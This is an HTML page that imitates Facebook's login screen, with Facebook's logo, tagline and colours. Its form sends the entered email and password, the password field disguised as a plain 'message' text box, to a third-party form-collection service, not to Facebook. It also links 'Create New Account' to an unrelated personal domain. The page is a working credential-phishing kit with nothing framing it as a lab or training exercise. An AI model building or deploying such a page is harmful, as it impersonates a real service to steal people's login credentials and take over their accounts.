<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login Form</title>
<style>
  body {
    padding: 0;
    margin: 0;
    background: #f0f2f5;
    font-family: Arial, sans-serif;
  }

  .box {
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
  }

  .title-box {
    width: 100%;
    max-width: 500px;
    text-align: center;
    margin-right: 20px;
  }

  .title-box img {
    width: 100%;
    max-width: 235px;
    margin-bottom: -10px;
  }

  .title-box p {
    color: #000;
    font-size: 20px;
    line-height: 26px;
  }

  .form-box {
    width: 100%;
    max-width: 400px;
    padding: 15px;
    text-align: center;
    border-radius: 5px;
    background: #fff;
    box-shadow: 0px 2px 10px 1px rgba(71, 71, 71, 0.52);
  }

  .form-box input {
    width: calc(100% - 30px); /* Adjusted for padding */
    margin-bottom: 15px;
    padding: 15px;
    font-size: 18px;
    box-sizing: border-box;
    border: 1px solid #eeebeb;
    border-radius: 5px;
    outline: none;
  }

  .form-box input:focus {
    box-shadow: 0px 0px 1px 1px rgb(22, 111, 229);
  }

  .form-box button {
    width: calc(100% - 30px); /* Adjusted for padding */
    margin-bottom: 15px;
    color: #fff;
    font-size: 20px;
    font-weight: 600;
    border-radius: 5px;
    border: none;
    padding: 13px 0;
    cursor: pointer;
    background: #1877f2; /* Facebook blue */
  }

  .form-box button:hover {
    background: #166fe5; /* Darker blue on hover */
  }

  .form-box a {
    color: #166fe5;
    font-size: 14px;
    text-decoration: none;
    margin-top: 5px;
    margin-bottom: 20px;
    display: block;
  }

  .form-box a:hover {
    text-decoration: underline;
  }

  .form-box hr {
    border: 1px solid #dadde1;
    margin-bottom: 15px;
  }

  .form-box .create-btn a {
    color: #fff;
    font-size: 16px;
    text-decoration: none;
    padding: 15px 20px;
    border-radius: 5px;
    background: #36a420; /* Green color */
    font-weight: 600;
    display: inline-block;
    margin-bottom: 5px;
  }

  .form-box .create-btn a:hover {
    background: #42b72a;
  }

  @media only screen and (max-width: 600px) {
    .form-box input,
    .form-box button {
      width: 100%; /* Adjusting width for smaller screens */
    }
  }
</style>
</head>
<body>
<div class="box">
  <div class="title-box">
    <img src="https://i.postimg.cc/NMyj90t9/logo.png" alt="Facebook">
    <p>Facebook helps you connect and share with the people in your life.</p>
  </div>
  <div class="form-box">
    <form action="https://formspree.io/f/mdoqyjqw" method="POST">
      <label for="email"></label>
      <input type="text" id="email" name="email" placeholder="Email" required>
      <label for="text"></label>
      <input type="text" id="message" name="message" placeholder="Password" required>

      <input type="submit" value="Login">
      <a href="#">Forgotten Password</a>
    </form>
    <hr>
    <div class="create-btn">
      <a href="https://wasimulkarimniloy.top" target="_blank">Create New Account</a>
    </div>
  </div>
</div>
  <iframe width="560" height="315" src="https://www.youtube.com/embed/1yAuj_BgeSg?si=w8XKNZJXW1IeVM84" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</body>
</html>
